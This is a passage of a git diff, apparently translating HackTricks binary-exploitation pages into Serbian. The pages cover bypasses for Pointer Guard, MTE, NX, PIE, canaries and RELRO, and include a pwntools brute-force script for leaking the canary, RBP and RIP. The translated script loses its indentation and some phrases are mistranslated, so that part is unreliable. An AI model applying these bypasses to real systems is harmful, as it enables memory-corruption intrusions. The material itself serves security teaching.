**Exploiting Known Plaintexts:** - - **Identifying Fixed Function Pointers:** By examining glibc source code or initialized function pointer tables (like `__libc_pthread_functions`), an attacker can find predictable function pointers. - - **Computing the Secret:** Using a known function pointer such as `__pthread_attr_destroy` and its mangled version from the function pointer table, the secret can be calculated by reverse rotating (right rotation) the mangled pointer and then XORing it with the address of the function. -4. **Alternative Plaintexts:** The attacker can also experiment with mangling pointers with known values like 0 or -1 to see if these produce identifiable patterns in memory, potentially revealing the secret when these patterns are found in memory dumps. -5. **Practical Application:** After computing the secret, an attacker can manipulate pointers in a controlled manner, essentially bypassing the Pointer Guard protection in a multithreaded application with knowledge of the libc base address and an ability to read arbitrary memory locations. +1. **Razumevanje operacija zaštite pokazivača:** Mešanje (manipulacija) pokazivača se vrši korišćenjem makroa `PTR_MANGLE` koji XOR-uje pokazivač sa 64-bitnom tajnom i zatim vrši levo pomeranje od 0x11 bitova. Obrnuta operacija za vraćanje originalnog pokazivača se obavlja pomoću `PTR_DEMANGLE`. +2. **Strategija napada:** Napad se zasniva na pristupu poznatom plain textu, gde napadač treba da zna i originalne i izmenjene verzije pokazivača da bi dedukovao tajnu korišćenu za mešanje. +3. **Eksploatacija poznatih plain textova:** +- **Identifikacija fiksnih funkcijskih pokazivača:** Istražujući izvorni kod glibc-a ili inicijalizovane tabele funkcijskih pokazivača (poput `__libc_pthread_functions`), napadač može pronaći predvidljive funkcijske pokazivače. 
+- **Izračunavanje tajne:** Koristeći poznati funkcijski pokazivač kao što je `__pthread_attr_destroy` i njegovu izmenjenu verziju iz tabele funkcijskih pokazivača, tajna se može izračunati obrnuto rotirajući (desno rotiranje) izmenjeni pokazivač i zatim XOR-ujući ga sa adresom funkcije. +4. **Alternativni plain textovi:** Napadač može takođe eksperimentisati sa mešanjem pokazivača sa poznatim vrednostima kao što su 0 ili -1 da vidi da li ove proizvode prepoznatljive obrasce u memoriji, potencijalno otkrivajući tajnu kada se ovi obrasci pronađu u dump-ovima memorije. +5. **Praktična primena:** Nakon izračunavanja tajne, napadač može manipulirati pokazivačima na kontrolisan način, suštinski obilažeći zaštitu pokazivača u višedretvenoj aplikaciji sa znanjem o osnovnoj adresi libc-a i sposobnošću čitanja proizvoljnih memorijskih lokacija. -## References +## Reference - [https://maxwelldulin.com/BlogPost?post=5445977088](https://maxwelldulin.com/BlogPost?post=5445977088) - [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md index 43980bbca..b4802e27e 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md 
@@ -2,82 +2,80 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**Memory Tagging Extension (MTE)** is designed to enhance software reliability and security by **detecting and preventing memory-related errors**, such as buffer overflows and use-after-free vulnerabilities. MTE, as part of the **ARM** architecture, provides a mechanism to attach a **small tag to each memory allocation** and a **corresponding tag to each pointer** referencing that memory. This approach allows for the detection of illegal memory accesses at runtime, significantly reducing the risk of exploiting such vulnerabilities for executing arbitrary code. +**Memory Tagging Extension (MTE)** je dizajniran da poboljša pouzdanost i sigurnost softvera tako što **otkriva i sprečava greške povezane sa memorijom**, kao što su buffer overflows i use-after-free ranjivosti. MTE, kao deo **ARM** arhitekture, pruža mehanizam za pridruživanje **malog taga svakoj alokaciji memorije** i **odgovarajućeg taga svakom pokazivaču** koji referencira tu memoriju. Ovaj pristup omogućava otkrivanje ilegalnih pristupa memoriji u vreme izvođenja, značajno smanjujući rizik od iskorišćavanja takvih ranjivosti za izvršavanje proizvoljnog koda. -### **How Memory Tagging Extension Works** +### **Kako funkcioniše Memory Tagging Extension** -MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size. +MTE funkcioniše tako što **deliti memoriju na male, fiksne blokove, pri čemu je svaki blok dodeljen tag,** obično veličine nekoliko bita. -When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block. +Kada se kreira pokazivač koji pokazuje na tu memoriju, dobija isti tag. 
Ovaj tag se čuva u **neiskorišćenim bitovima pokazivača u memoriji**, efektivno povezujući pokazivač sa odgovarajućim memorijskim blokom.

https://www.youtube.com/watch?v=UwMt0e_dC_Q

-When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.** +Kada program pristupa memoriji putem pokazivača, MTE hardver proverava da li **tag pokazivača odgovara tagu memorijskog bloka**. Ako se tagovi **ne poklapaju**, to ukazuje na **ilegalan pristup memoriji.** -### MTE Pointer Tags +### MTE Tagovi Pokazivača -Tags inside a pointer are stored in 4 bits inside the top byte: +Tagovi unutar pokazivača se čuvaju u 4 bita unutar gornjeg bajta:

https://www.youtube.com/watch?v=UwMt0e_dC_Q

-Therefore, this allows up to **16 different tag values**. +Stoga, ovo omogućava do **16 različitih vrednosti taga**. -### MTE Memory Tags +### MTE Tagovi Memorije -Every **16B of physical memory** have a corresponding **memory tag**. +Svaka **16B fizičke memorije** ima odgovarajući **tag memorije**. -The memory tags are stored in a **dedicated RAM region** (not accessible for normal usage). Having 4bits tags for every 16B memory tags up to 3% of RAM. - -ARM introduces the following instructions to manipulate these tags in the dedicated RAM memory: +Tagovi memorije se čuvaju u **posvećenoj RAM oblasti** (koja nije dostupna za normalnu upotrebu). Imajući 4bita tagove za svaki 16B tag memorije do 3% RAM-a. +ARM uvodi sledeće instrukcije za manipulaciju ovim tagovima u posvećenoj RAM memoriji: ``` STG [], # Store Allocation (memory) Tag LDG , [] Load Allocatoin (memory) Tag IRG , Insert Random [pointer] Tag ... ``` +## Proveravanje režima -## Checking Modes +### Sinhrono -### Sync +CPU proverava oznake **tokom izvršavanja instrukcija**, ako dođe do neslaganja, podiže izuzetak.\ +Ovo je najsporije i najbezbednije. -The CPU check the tags **during the instruction executing**, if there is a mismatch, it raises an exception.\ -This is the slowest and most secure. +### Asinhrono -### Async +CPU proverava oznake **asinhrono**, i kada se pronađe neslaganje, postavlja bit izuzetka u jednom od sistemskih registara. To je **brže** od prethodnog, ali je **nesposobno da ukaže** na tačnu instrukciju koja je izazvala neslaganje i ne podiže izuzetak odmah, dajući malo vremena napadaču da završi svoj napad. -The CPU check the tags **asynchronously**, and when a mismatch is found it sets an exception bit in one of the system registers. It's **faster** than the previous one but it's **unable to point out** the exact instruction that cause the mismatch and it doesn't raise the exception immediately, giving some time to the attacker to complete his attack. - -### Mixed +### Mešano ??? 
-## Implementation & Detection Examples +## Primeri implementacije i detekcije -Called Hardware Tag-Based KASAN, MTE-based KASAN or in-kernel MTE.\ -The kernel allocators (like `kmalloc`) will **call this module** which will prepare the tag to use (randomly) attach it to the kernel space allocated and to the returned pointer. +Naziva se Hardware Tag-Based KASAN, MTE-based KASAN ili in-kernel MTE.\ +Kernel alokatori (kao što je `kmalloc`) će **pozvati ovaj modul** koji će pripremiti oznaku za korišćenje (slučajno) i prikačiti je na alocirani kernel prostor i na vraćeni pokazivač. -Note that it'll **only mark enough memory granules** (16B each) for the requested size. So if the requested size was 35 and a slab of 60B was given, it'll mark the first 16\*3 = 48B with this tag and the **rest** will be **marked** with a so-called **invalid tag (0xE)**. +Napomena: **označiće samo dovoljno memorijskih granula** (16B svaka) za traženu veličinu. Dakle, ako je tražena veličina bila 35, a data je granula od 60B, označiće prvih 16\*3 = 48B ovom oznakom, a **ostatak** će biti **označen** takozvanom **nevažećom oznakom (0xE)**. -The tag **0xF** is the **match all pointer**. A memory with this pointer allows **any tag to be used** to access its memory (no mismatches). This could prevent MET from detecting an attack if this tags is being used in the attacked memory. +Oznaka **0xF** je **pokazivač koji se poklapa sa svime**. Memorija sa ovom oznakom omogućava **bilo koju oznaku da se koristi** za pristup njenoj memoriji (bez neslaganja). Ovo bi moglo sprečiti MET da detektuje napad ako se ove oznake koriste u napadnutoj memoriji. -Therefore there are only **14 value**s that can be used to generate tags as 0xE and 0xF are reserved, giving a probability of **reusing tags** to 1/17 -> around **7%**. +Stoga postoji samo **14 vrednosti** koje se mogu koristiti za generisanje oznaka, jer su 0xE i 0xF rezervisane, što daje verovatnoću **ponovne upotrebe oznaka** od 1/17 -> oko **7%**. 
-If the kernel access to the **invalid tag granule**, the **mismatch** will be **detected**. If it access another memory location, if the **memory has a different tag** (or the invalid tag) the mismatch will be **detected.** If the attacker is lucky and the memory is using the same tag, it won't be detected. Chances are around 7% +Ako kernel pristupi **nevažećoj granuli oznake**, **neslaganje** će biti **detektovano**. Ako pristupi drugoj memorijskoj lokaciji, ako **memorija ima drugačiju oznaku** (ili nevažeću oznaku), neslaganje će biti **detektovano**. Ako je napadač srećan i memorija koristi istu oznaku, to neće biti detektovano. Šanse su oko 7%. -Another bug occurs in the **last granule** of the allocated memory. If the application requested 35B, it was given the granule from 32 to 48. Therefore, the **bytes from 36 til 47 are using the same tag** but they weren't requested. If the attacker access **these extra bytes, this isn't detected**. +Još jedna greška se javlja u **poslednjoj granuli** alocirane memorije. Ako je aplikacija tražila 35B, data je granula od 32 do 48. Stoga, **bajti od 36 do 47 koriste istu oznaku** ali nisu traženi. Ako napadač pristupi **ovim dodatnim bajtovima, to neće biti detektovano**. -When **`kfree()`** is executed, the memory is retagged with the invalid memory tag, so in a **use-after-free**, when the memory is accessed again, the **mismatch is detected**. +Kada se izvrši **`kfree()`**, memorija se ponovo označava nevažećom memorijskom oznakom, tako da u **upotrebi nakon oslobađanja**, kada se memorija ponovo pristupi, **neslaganje se detektuje**. -However, in a use-after-free, if the same **chunk is reallocated again with the SAME tag** as previously, an attacker will be able to use this access and this won't be detected (around 7% chance). +Međutim, u upotrebi nakon oslobađanja, ako se isti **deo ponovo alocira sa ISTOM oznakom** kao prethodno, napadač će moći da iskoristi ovaj pristup i to neće biti detektovano (oko 7% šanse). 
-Moreover, only **`slab` and `page_alloc`** uses tagged memory but in the future this will also be used in `vmalloc`, `stack` and `globals` (at the moment of the video these can still be abused). +Štaviše, samo **`slab` i `page_alloc`** koriste označenu memoriju, ali će se u budućnosti ovo takođe koristiti u `vmalloc`, `stack` i `globals` (u trenutku snimanja videa, ove se još uvek mogu zloupotrebiti). -When a **mismatch is detected** the kernel will **panic** to prevent further exploitation and retries of the exploit (MTE doesn't have false positives). +Kada se **neslaganje detektuje**, kernel će **panikovati** kako bi sprečio dalju eksploataciju i ponovne pokušaje eksploata. (MTE nema lažno pozitivne rezultate). -## References +## Reference - [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md index 376dfe6c4..ec1ec6e0e 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md 
@@ -2,15 +2,15 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel terminology, is a hardware-based security feature designed to **mitigate** the effects of **buffer overflow** attacks. When implemented and enabled, it distinguishes between memory regions that are intended for **executable code** and those meant for **data**, such as the **stack** and **heap**. The core idea is to prevent an attacker from executing malicious code through buffer overflow vulnerabilities by putting the malicious code in the stack for example and directing the execution flow to it. +**No-Execute (NX)** bit, takođe poznat kao **Execute Disable (XD)** u Intel terminologiji, je hardverska bezbednosna funkcija dizajnirana da **ublaži** efekte **buffer overflow** napada. Kada se implementira i aktivira, razlikuje između memorijskih regiona koji su namenjeni za **izvršni kod** i onih koji su namenjeni za **podatke**, kao što su **stack** i **heap**. Osnovna ideja je da se spreči napadač da izvrši zlonamerni kod kroz ranjivosti buffer overflow tako što će staviti zlonamerni kod u stack, na primer, i usmeriti tok izvršenja ka njemu. -## Bypasses +## Obilaženja -- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary. - - [**Ret2libc**](../rop-return-oriented-programing/ret2lib/) - - [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/) - - **Ret2...** +- Moguće je koristiti tehnike kao što su [**ROP**](../rop-return-oriented-programing/) **da se obezbedi** ovo zaštita izvršavanjem delova izvršnog koda koji su već prisutni u binarnom fajlu. 
+- [**Ret2libc**](../rop-return-oriented-programing/ret2lib/) +- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/) +- **Ret2...** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index 99a33743d..8db3c01a0 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md 
@@ -2,30 +2,30 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -A binary compiled as PIE, or **Position Independent Executable**, means the **program can load at different memory locations** each time it's executed, preventing hardcoded addresses. +Binarni fajl kompajliran kao PIE, ili **izvršni fajl nezavisne pozicije**, znači da se **program može učitati na različitim memorijskim lokacijama** svaki put kada se izvrši, sprečavajući hardkodirane adrese. -The trick to exploit these binaries lies in exploiting the **relative addresses**—the offsets between parts of the program remain the same even if the absolute locations change. To **bypass PIE, you only need to leak one address**, typically from the **stack** using vulnerabilities like format string attacks. Once you have an address, you can calculate others by their **fixed offsets**. +Trik za iskorišćavanje ovih binarnih fajlova leži u iskorišćavanju **relativnih adresa**—ofseti između delova programa ostaju isti čak i ako se apsolutne lokacije menjaju. Da biste **obišli PIE, potrebno je da iscuri jedna adresa**, obično sa **stack-a** koristeći ranjivosti poput napada format string. Kada dobijete adresu, možete izračunati druge prema njihovim **fiksnim ofsetima**. -A helpful hint in exploiting PIE binaries is that their **base address typically ends in 000** due to memory pages being the units of randomization, sized at 0x1000 bytes. This alignment can be a critical **check if an exploit isn't working** as expected, indicating whether the correct base address has been identified.\ -Or you can use this for your exploit, if you leak that an address is located at **`0x649e1024`** you know that the **base address is `0x649e1000`** and from the you can just **calculate offsets** of functions and locations. 
+Koristan savet u iskorišćavanju PIE binarnih fajlova je da njihova **osnovna adresa obično završava sa 000** zbog toga što su memorijske stranice jedinice randomizacije, veličine 0x1000 bajtova. Ova usklađenost može biti kritična **provera ako eksploatacija ne funkcioniše** kako se očekuje, ukazujući na to da li je pravilna osnovna adresa identifikovana.\ +Ili možete ovo koristiti za vašu eksploataciju, ako iscuri da se adresa nalazi na **`0x649e1024`** znate da je **osnovna adresa `0x649e1000`** i odatle možete samo **izračunati ofsete** funkcija i lokacija. -## Bypasses +## Obilaženja -In order to bypass PIE it's needed to **leak some address of the loaded** binary, there are some options for this: +Da biste obišli PIE potrebno je **iscuriti neku adresu učitanog** binarnog fajla, postoje neke opcije za to: -- **Disabled ASLR**: If ASLR is disabled a binary compiled with PIE is always **going to be loaded in the same address**, therefore **PIE is going to be useless** as the addresses of the objects are always going to be in the same place. -- Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) -- **Brute-force EBP and EIP values** in the stack until you leak the correct ones: +- **Onemogućen ASLR**: Ako je ASLR onemogućen, binarni fajl kompajliran sa PIE se uvek **učitava na istoj adresi**, stoga je **PIE beskoristan** jer su adrese objekata uvek na istom mestu. +- Da vam **bude data** curenje (uobičajeno u lakim CTF izazovima, [**proverite ovaj primer**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) +- **Brute-force EBP i EIP vrednosti** na stack-u dok ne iscurite prave: {{#ref}} bypassing-canary-and-pie.md {{#endref}} -- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. 
from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). +- Koristite **arbitrarno čitanje** ranjivost kao što je [**format string**](../../format-strings/) da iscurite adresu binarnog fajla (npr. sa stack-a, kao u prethodnoj tehnici) da dobijete osnovu binarnog fajla i koristite ofsete odatle. [**Pronađite primer ovde**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md index 996facccb..1478b56c6 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md 
@@ -1,56 +1,55 @@ -# BF Addresses in the Stack +# BF Adrese u Steku {{#include ../../../banners/hacktricks-training.md}} -**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**Ako se suočavate sa binarnim fajlom zaštićenim kanarijem i PIE (Poziciono Nezavisna Izvršna Datoteka), verovatno ćete morati da pronađete način da ih zaobiđete.** ![](<../../../images/image (865).png>) > [!NOTE] -> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +> Imajte na umu da **`checksec`** možda neće otkriti da je binarni fajl zaštićen kanarijem ako je statički kompajliran i nije u stanju da identifikuje funkciju.\ +> Međutim, možete to ručno primetiti ako otkrijete da je vrednost sačuvana u steku na početku poziva funkcije i da se ova vrednost proverava pre izlaska. -## Brute-Force Addresses +## Brute-Force Adrese -In order to **bypass the PIE** you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ -For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** +Da biste **zaobišli PIE**, potrebno je da **procurite neku adresu**. 
A ako binarni fajl ne propušta nikakve adrese, najbolje je da **brute-forcujete RBP i RIP sačuvane u steku** u ranjivoj funkciji.\ +Na primer, ako je binarni fajl zaštićen koristeći i **kanarija** i **PIE**, možete početi sa brute-forcovanjem kanarije, zatim će **sledećih** 8 bajtova (x64) biti sačuvani **RBP**, a **sledećih** 8 bajtova će biti sačuvani **RIP.** > [!TIP] -> It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case. - -To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: +> Pretpostavlja se da adresa povratka unutar steka pripada glavnom binarnom kodu, koji, ako je ranjivost locirana u binarnom kodu, obično će biti slučaj. +Da biste brute-forcovali RBP i RIP iz binarnog fajla, možete shvatiti da je validan pogodak bajta tačan ako program nešto ispiše ili jednostavno ne sruši. 
**Ista funkcija** koja je data za brute-forcovanje kanarije može se koristiti za brute-forcovanje RBP i RIP: ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base # CANARY BF HERE canary_offset = 1176 
@@ -67,30 +66,25 @@ print("Brute-Forcing RIP") base_canary_rbp_rip = get_bf(base_canary_rbp) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) ``` +Poslednja stvar koju treba da uradite da biste savladali PIE je da izračunate **korisne adrese iz otkrivenih** adresa: **RBP** i **RIP**. -The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. - -From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: - +Iz **RBP** možete izračunati **gde pišete svoj shell u steku**. Ovo može biti veoma korisno da znate gde ćete napisati string _"/bin/sh\x00"_ unutar steka. 
Da biste izračunali razdaljinu između otkrivenog RBP-a i vašeg shellcode-a, jednostavno stavite **prekidač nakon otkrivanja RBP-a** i proverite **gde se nalazi vaš shellcode**, zatim možete izračunati razdaljinu između shellcode-a i RBP-a: ```python INI_SHELLCODE = RBP - 1152 ``` - -From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ -To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: +Iz **RIP** možete izračunati **osnovnu adresu PIE binarnog fajla** koja će vam biti potrebna za kreiranje **validnog ROP lanca**.\ +Da biste izračunali osnovnu adresu, jednostavno uradite `objdump -d vunbinary` i proverite poslednje adrese disasemblerovanog koda: ![](<../../../images/image (479).png>) -In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000` - +U tom primeru možete videti da je potrebno samo **1 i po bajt** da se locira sav kod, tako da će osnovna adresa u ovoj situaciji biti **procureni RIP, ali završava na "000"**. Na primer, ako ste procurili `0x562002970ecf`, osnovna adresa je `0x562002970000` ```python elf.address = RIP - (RIP & 0xfff) ``` +## Poboljšanja -## Improvements +Prema [**nekim zapažanjima iz ovog posta**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), moguće je da kada se curi RBP i RIP vrednosti, server neće pasti sa nekim vrednostima koje nisu tačne i BF skripta će pomisliti da je dobila dobre. To je zato što je moguće da **neke adrese jednostavno neće izazvati grešku čak i ako nisu tačne**. 
-According to [**some observation from this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), it's possible that when leaking RBP and RIP values, the server won't crash with some values which aren't the correct ones and the BF script will think he got the good ones. This is because it's possible that **some addresses just won't break it even if there aren't exactly the correct ones**. - -According to that blog post it's recommended to add a short delay between requests to the server is introduced. +Prema tom blog postu, preporučuje se da se uvede kratka kašnjenja između zahteva ka serveru. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md index 59b406c5e..efae1b946 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md 
@@ -4,32 +4,30 @@ ## Relro -**RELRO** stands for **Relocation Read-Only**, and it's a security feature used in binaries to mitigate the risks associated with **GOT (Global Offset Table)** overwrites. There are two types of **RELRO** protections: (1) **Partial RELRO** and (2) **Full RELRO**. Both of them reorder the **GOT** and **BSS** from ELF files, but with different results and implications. Speciifically, they place the **GOT** section _before_ the **BSS**. That is, **GOT** is at lower addresses than **BSS**, hence making it impossible to overwrite **GOT** entries by overflowing variables in the **BSS** (rembember writing into memory happens from lower toward higher addresses). +**RELRO** označava **Relocation Read-Only**, i to je bezbednosna funkcija koja se koristi u binarnim datotekama kako bi se smanjili rizici povezani sa **GOT (Global Offset Table)** prepisivanjima. Postoje dve vrste **RELRO** zaštita: (1) **Delimični RELRO** i (2) **Potpuni RELRO**. Obe preuređuju **GOT** i **BSS** iz ELF datoteka, ali sa različitim rezultatima i implikacijama. Konkretno, postavljaju **GOT** sekciju _pre_ **BSS**. To jest, **GOT** je na nižim adresama od **BSS**, što onemogućava prepisivanje **GOT** unosa prelivanjem promenljivih u **BSS** (zapamtite da se pisanje u memoriju dešava od nižih ka višim adresama). -Let's break down the concept into its two distinct types for clarity. +Hajde da razložimo koncept na njegove dve različite vrste radi jasnoće. -### **Partial RELRO** +### **Delimični RELRO** -**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. Partial RELRO makes **the .got read only (the non-PLT part of the GOT section)**. Bear in mind that the rest of the section (like the .got.plt) is still writeable and, therefore, subject to attacks. This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities. 
+**Delimični RELRO** koristi jednostavniji pristup za poboljšanje bezbednosti bez značajnog uticaja na performanse binarne datoteke. Delimični RELRO čini **.got samo za čitanje (ne-PLT deo GOT sekcije)**. Imajte na umu da je ostatak sekcije (kao što je .got.plt) i dalje moguće pisati i, stoga, podložan napadima. Ovo **ne sprečava GOT** da bude zloupotrebljen **iz ranjivosti slobodnog pisanja**. -Note: By default, GCC compiles binaries with Partial RELRO. +Napomena: Po defaultu, GCC kompajlira binarne datoteke sa Delimičnim RELRO. -### **Full RELRO** +### **Potpuni RELRO** -**Full RELRO** steps up the protection by **making the entire GOT (both .got and .got.plt) and .fini_array** section completely **read-only.** Once the binary starts all the function addresses are resolved and loaded in the GOT, then, GOT is marked as read-only, effectively preventing any modifications to it during runtime. +**Potpuni RELRO** pojačava zaštitu tako što **čini celu GOT (i .got i .got.plt) i .fini_array** sekciju potpuno **samo za čitanje.** Kada se binarna datoteka pokrene, svi adrese funkcija se rešavaju i učitavaju u GOT, zatim, GOT se označava kao samo za čitanje, efikasno sprečavajući bilo kakve izmene tokom izvršavanja. -However, the trade-off with Full RELRO is in terms of performance and startup time. Because it needs to resolve all dynamic symbols at startup before marking the GOT as read-only, **binaries with Full RELRO enabled may experience longer load times**. This additional startup overhead is why Full RELRO is not enabled by default in all binaries. - -It's possible to see if Full RELRO is **enabled** in a binary with: +Međutim, kompromis sa Potpunim RELRO je u pogledu performansi i vremena pokretanja. Pošto je potrebno da se reše svi dinamički simboli prilikom pokretanja pre nego što se GOT označi kao samo za čitanje, **binarne datoteke sa omogućеним Potpunim RELRO mogu doživeti duže vreme učitavanja**. 
Ova dodatna prekomerna opterećenja prilikom pokretanja su razlog zašto Potpuni RELRO nije omogućен po defaultu u svim binarnim datotekama. +Moguće je videti da li je Potpuni RELRO **omogućen** u binarnoj datoteci sa: ```bash readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` - ## Bypass -If Full RELRO is enabled, the only way to bypass it is to find another way that doesn't need to write in the GOT table to get arbitrary execution. +Ako je Full RELRO omogućen, jedini način da se zaobiđe je da se pronađe drugi način koji ne zahteva pisanje u GOT tabelu za dobijanje proizvoljne izvršne radnje. -Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** +Napomena da je **LIBC-ova GOT obično Partial RELRO**, tako da se može modifikovati sa proizvoljnim pisanjem. Više informacija u [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 5c1044b98..2c6bc76ba 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md 
@@ -2,72 +2,72 @@ {{#include ../../../banners/hacktricks-training.md}} -## **StackGuard and StackShield** +## **StackGuard i StackShield** -**StackGuard** inserts a special value known as a **canary** before the **EIP (Extended Instruction Pointer)**, specifically `0x000aff0d` (representing null, newline, EOF, carriage return) to protect against buffer overflows. However, functions like `recv()`, `memcpy()`, `read()`, and `bcopy()` remain vulnerable, and it does not protect the **EBP (Base Pointer)**. +**StackGuard** umetne posebnu vrednost poznatu kao **canary** pre **EIP (Extended Instruction Pointer)**, specifično `0x000aff0d` (predstavlja null, newline, EOF, carriage return) kako bi se zaštitio od buffer overflow-a. Međutim, funkcije kao što su `recv()`, `memcpy()`, `read()`, i `bcopy()` ostaju ranjive, a ne štiti **EBP (Base Pointer)**. -**StackShield** takes a more sophisticated approach than StackGuard by maintaining a **Global Return Stack**, which stores all return addresses (**EIPs**). This setup ensures that any overflow does not cause harm, as it allows for a comparison between stored and actual return addresses to detect overflow occurrences. Additionally, StackShield can check the return address against a boundary value to detect if the **EIP** points outside the expected data space. However, this protection can be circumvented through techniques like Return-to-libc, ROP (Return-Oriented Programming), or ret2ret, indicating that StackShield also does not protect local variables. +**StackShield** koristi sofisticiraniji pristup od StackGuard-a održavajući **Global Return Stack**, koji čuva sve adrese povratka (**EIPs**). Ova postavka osigurava da bilo 